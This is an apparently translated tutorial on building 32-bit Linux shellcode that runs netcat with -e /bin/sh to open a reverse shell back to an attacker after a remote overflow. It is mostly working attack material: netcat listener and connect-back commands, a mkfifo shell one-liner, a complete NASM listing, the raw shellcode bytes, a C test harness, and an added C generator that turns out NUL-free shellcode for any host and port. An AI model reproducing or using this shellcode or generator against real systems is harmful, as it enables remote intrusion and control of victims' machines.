Shellcode for a reverse connection using netcat


from:http://morgawr.github.io/hacking/2014/03/29/shellcode-to-reverse-bind-with-netcat/

This article is about how to construct shellcode for a remote overflow so that, once it runs, it establishes a working reverse connection back to the attacker.

0x00 Reverse-connecting remote shell

There are many ways to establish a connection between a local host and a remote shell. The most common is to open a port on the remote host and redirect the shell's stdin/stdout/stderr to that socket (a bind shell). This lets us connect to it with a simple netcat command from our own host.

In most cases, however, this does not work: many servers expose only a handful of ports, such as HTTP(S), FTP and SMTP, and the firewall simply drops packets to anything else. The solution is a reverse connection, meaning the remote host actively connects back to our server. So we open a port on our own machine and wait for the victim to connect to us.

0x01 The netcat -e option

First, assume that netcat is installed on the target and that it is a build with -e support. The -e option runs the given program and attaches its stdin/stdout to the connection. If we bind /bin/sh with -e and listen, then connecting to that host from a remote machine gives us a shell. Let's try it.

Run this on the local host to listen for incoming connections:

    netcat -lvp 9999

Then open a second shell and run:

    netcat -e /bin/sh 127.0.0.1 9999

The first shell now holds a connection; run commands such as ls or whoami in it to check that the shell works. Ctrl+C closes the connection.

Note: the OpenBSD version of netcat does not support the -e or -c options. The following one-liner, which wires the shell through a named pipe, can be used instead:

    rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 9999 > /tmp/f

But that is far too complicated to express in shellcode, so the rest of this article assumes a netcat with -e.

0x02 Assembly Code

Now let's look at how to express the netcat command in assembly and turn it into shellcode. Here is the assembly code that the shellcode runs (Intel syntax, NASM). The line numbers are referenced in the explanation below.

     1  jmp short forward
     2  back:
     3      pop esi                    ; esi = address of the command string
     4      xor eax, eax               ; eax = 0 without using a NUL byte
     5      mov byte [esi + 11], al    ; terminate /bin/netcat
     6      mov byte [esi + 14], al    ; terminate -e
     7      mov byte [esi + 22], al    ; terminate /bin/sh
     8      mov byte [esi + 38], al    ; terminate 127.127.127.127
     9      mov byte [esi + 43], al    ; terminate 9999
    10      mov dword [esi + 44], esi  ; address of /bin/netcat in AAAA
    11      lea ebx, [esi + 12]        ; get address of -e
    12      mov dword [esi + 48], ebx  ; store address of -e in BBBB
    13      lea ebx, [esi + 15]        ; get address of /bin/sh
    14      mov dword [esi + 52], ebx  ; store address of /bin/sh in CCCC
    15      lea ebx, [esi + 23]        ; get address of 127.127.127.127
    16      mov dword [esi + 56], ebx  ; store address of 127.127.127.127 in DDDD
    17      lea ebx, [esi + 39]        ; get address of 9999
    18      mov dword [esi + 60], ebx  ; store address of 9999 in EEEE
    19      mov dword [esi + 64], eax  ; put NULL in FFFF
    20      mov al, 0x0b               ; execve syscall number
    21      mov ebx, esi               ; filename = /bin/netcat
    22      lea ecx, [esi + 44]        ; argv = /bin/netcat -e /bin/sh 127.127.127.127 9999
    23      lea edx, [esi + 64]        ; envp = NULL
    24      int 0x80                   ; run the execve syscall
    25
    26  forward:
    27      call back
    28      db "/bin/netcat#-e#/bin/sh#127.127.127.127#9999#AAAABBBBCCCCDDDDEEEEFFFF"

(The original listing wrote the 32-bit stores as `mov long`; NASM's size keyword is `dword`, which assembles to the same opcodes.)

The code above is equivalent to these two lines of C:

    char *command[] = {"/bin/netcat", "-e", "/bin/sh", "127.127.127.127", "9999", NULL};
    execve(command[0], command, NULL);

The command string is:

    /bin/netcat#-e#/bin/sh#127.127.127.127#9999#AAAABBBBCCCCDDDDEEEEFFFF

The parts of the string are separated by # rather than by NUL bytes because a NUL is not allowed in the shellcode: a string-copy overflow stops at the first NUL, so the shellcode would be truncated and would not run correctly on the target host.

Wherever this code ends up running, the first thing it needs to know is the address of the command string.

So the code defines two labels, back (line 2) and forward (line 26). Line 1 jumps over the main body to forward, and the call on line 27 pushes its return address onto the stack. That return address is the address of the next "instruction", which is exactly our command string (line 28).

Back at line 3 we pop the string address into ESI and then zero EAX. Note that we cannot simply write

    mov eax, 0

because that instruction assembles to b8 00 00 00 00, and NUL bytes are not allowed in shellcode; xor eax, eax gives the same result with no NULs. Next, the individual strings are terminated in place in memory.


Lines 5 through 9 write the zero in AL (produced by the XOR) over each # separator, turning the single string into five separately NUL-terminated strings. We also need an array of pointers to those strings to pass as the second argument of execve().

Line 10 stores the address of /bin/netcat into the AAAA slot; lines 11 to 18 do the same for the remaining arguments into BBBB through EEEE; finally, line 19 writes NULL (EAX) into the FFFF slot to terminate the array.

At line 20 we prepare the system call: 0x0b (execve) goes into AL, ESI (the address of /bin/netcat) into EBX, the address of the argv array into ECX, and the NULL envp into EDX; int 0x80 then triggers the syscall. If nothing goes wrong, netcat runs and makes the reverse connection. Note that lines 5 through 19 write into the shellcode's own bytes, so the shellcode must sit in memory that is writable as well as executable.

In this example the IP address is 127.127.127.127 (a loopback address) and the port is 9999. Normally you will replace it with an external IP; if the new address is not the same length, every offset in the assembly that depends on the string layout (the terminator offsets on lines 5 to 9 and the argument addresses on lines 11 to 17, plus the slot offsets 44 to 64) must be recomputed carefully.
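Recomputing those offsets by hand is error-prone, so here, as an added example that is not part of the original post or of morgawr's code, is a small C generator that emits the same execve shellcode for any host and port. It goes a little beyond the text: the host may be a hostname as well as an IP (netcat resolves either), the jmp and call displacements are computed rather than hard-coded so you can confirm the 0x3c and -65 from the listing, and the generator refuses input that would introduce a NUL byte or push an offset past the 8-bit displacement the code relies on. The function name, the EMIT helper and the rejection of '#' inside arguments are my own choices.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout, as in the post: "/bin/netcat -e /bin/sh <host> <port>". */
#define NARGS 5

/* Append len bytes to out without overrunning cap. Returns 0 or -1. */
static int emit(uint8_t *out, size_t cap, size_t *n, const uint8_t *bytes, size_t len)
{
    if (*n + len > cap)
        return -1;
    memcpy(out + *n, bytes, len);
    *n += len;
    return 0;
}

#define EMIT(...)                                              \
    do {                                                       \
        uint8_t tmp_[] = { __VA_ARGS__ };                      \
        if (emit(out, cap, &n, tmp_, sizeof tmp_) != 0)        \
            return -1;                                         \
    } while (0)

/* Build execve("/bin/netcat", {"/bin/netcat","-e","/bin/sh",host,port}, NULL)
 * shellcode for any host/port, recomputing the [esi + disp8] offsets that the
 * hand-written assembly hard-codes for 127.127.127.127:9999.
 * Returns the shellcode length, or -1 if it does not fit in cap, an argument
 * is empty or contains '#', an offset exceeds a signed 8-bit displacement,
 * or the result would contain a NUL byte. */
int build_nc_reverse_shellcode(const char *host, const char *port,
                               uint8_t *out, size_t cap)
{
    const char *args[NARGS] = { "/bin/netcat", "-e", "/bin/sh", host, port };
    size_t start[NARGS], term[NARGS];
    size_t pos = 0, n = 0, argv_off, null_off, call_off;
    uint32_t rel;
    int i;

    /* String layout: arg0#arg1#...#arg4# followed by six 4-byte argv slots.
     * Each '#' is a placeholder the code overwrites with 0 at run time. */
    for (i = 0; i < NARGS; i++) {
        if (args[i][0] == '\0' || strchr(args[i], '#') != NULL)
            return -1;
        start[i] = pos;
        term[i] = pos + strlen(args[i]);
        pos = term[i] + 1;
    }
    argv_off = pos;                   /* the AAAA slot: argv[0] */
    null_off = argv_off + 4 * NARGS;  /* the FFFF slot: argv[5] = NULL, also envp */
    if (null_off > 0x7f)              /* the largest disp8 we emit */
        return -1;

    EMIT(0xeb, 0x00);                 /* jmp short forward (disp patched below) */
    EMIT(0x5e);                       /* back: pop esi -> address of the string */
    EMIT(0x31, 0xc0);                 /* xor eax, eax */
    for (i = 0; i < NARGS; i++)
        EMIT(0x88, 0x46, (uint8_t)term[i]);             /* mov byte [esi+term], al */
    EMIT(0x89, 0x76, (uint8_t)argv_off);                /* mov [esi+argv_off], esi */
    for (i = 1; i < NARGS; i++) {
        EMIT(0x8d, 0x5e, (uint8_t)start[i]);            /* lea ebx, [esi+start] */
        EMIT(0x89, 0x5e, (uint8_t)(argv_off + 4 * i));  /* mov [esi+slot], ebx */
    }
    EMIT(0x89, 0x46, (uint8_t)null_off);                /* mov [esi+null_off], eax */
    EMIT(0xb0, 0x0b);                                   /* mov al, 11 (execve) */
    EMIT(0x89, 0xf3);                                   /* mov ebx, esi */
    EMIT(0x8d, 0x4e, (uint8_t)argv_off);                /* lea ecx, [esi+argv_off] */
    EMIT(0x8d, 0x56, (uint8_t)null_off);                /* lea edx, [esi+null_off] */
    EMIT(0xcd, 0x80);                                   /* int 0x80 */

    /* forward: call back. The call pushes the address of the string that
     * follows it; 'back' (the pop) sits at offset 2, so rel32 = 2 - (call+5). */
    call_off = n;
    out[1] = (uint8_t)(call_off - 2);                   /* jmp short lands on the call */
    rel = (uint32_t)(2 - (int32_t)(call_off + 5));
    EMIT(0xe8, rel & 0xff, (rel >> 8) & 0xff, (rel >> 16) & 0xff, (rel >> 24) & 0xff);

    for (i = 0; i < NARGS; i++) {
        if (emit(out, cap, &n, (const uint8_t *)args[i], strlen(args[i])) != 0)
            return -1;
        EMIT('#');
    }
    for (i = 0; i <= NARGS; i++)
        EMIT('A' + i, 'A' + i, 'A' + i, 'A' + i);       /* AAAA ... FFFF */

    /* A string-copy overflow stops at the first NUL, so refuse any. */
    if (memchr(out, 0, n) != NULL)
        return -1;
    return (int)n;
}

int main(int argc, char **argv)
{
    const char *host = argc > 1 ? argv[1] : "127.127.127.127";
    const char *port = argc > 2 ? argv[2] : "9999";
    uint8_t sc[256];
    int len = build_nc_reverse_shellcode(host, port, sc, sizeof sc), i;

    if (len < 0) {
        fprintf(stderr, "cannot encode %s %s without a NUL or an oversized offset\n", host, port);
        return 1;
    }
    for (i = 0; i < len; i++)
        printf("\\x%02x", sc[i]);
    printf("\n");
    return 0;
}
```

Run it with no arguments and it prints exactly the \x string shown in the next section; run it with a host and port of your own to get a shellcode whose offsets are already adjusted. The body between the jmp and the call is always 60 bytes, because every memory operand uses a one-byte displacement, which is also why the generator gives up once the NULL slot would sit beyond offset 127.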

0x03 Compiling and testing the shellcode

Now save the assembly code in a file, say shell.asm, and assemble it with:

    nasm -felf32 -o shell.o shell.asm

With objdump -d we can see the opcodes of this small program, and the following shell loop extracts them into the form of a C string:

    for i in $(objdump -d shell.o -M intel | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo

The result is:

    \xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x39\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46

Finally, we use a small C program (shellcode.c) to verify that the shellcode works. The shellcode is a global, non-const array so that it lives in the writable .data section; the program then casts it to a function pointer and calls it.

    /* global, writable: the shellcode patches its own string */
    char shellcode[] = "\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x39\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46";

    int main()
    {
        /* treat the byte array as a function and jump into it */
        int (*ret)() = (int (*)())shellcode;
        ret();
    }

To compile it you have to switch off some of the compiler's hardening defaults, then build with:

    gcc shellcode.c -fno-stack-protector -z execstack -o shellcode

Run netcat -lvp 9999 in another shell and then run ./shellcode; if everything is right you get a reverse shell. Two things must hold for this test: the shellcode must be writable, because it patches its own string (a global non-const array in .data is), and it must be executable, which -z execstack gives you here because on x86 Linux an executable stack makes the kernel map the process's readable segments executable too. If the program segfaults on a newer toolchain, copy the bytes into memory obtained from mmap with PROT_READ|PROT_WRITE|PROT_EXEC and jump there instead. The shellcode is 32-bit (int 0x80 with i386 syscall numbers and 32-bit pointers), so on a 64-bit host build the test program with -m32 as well.

en:http://blog.csdn.net/wgwgnihao/article/details/45933359

Cn:http://www.2cto.com/article/201404/292131.html

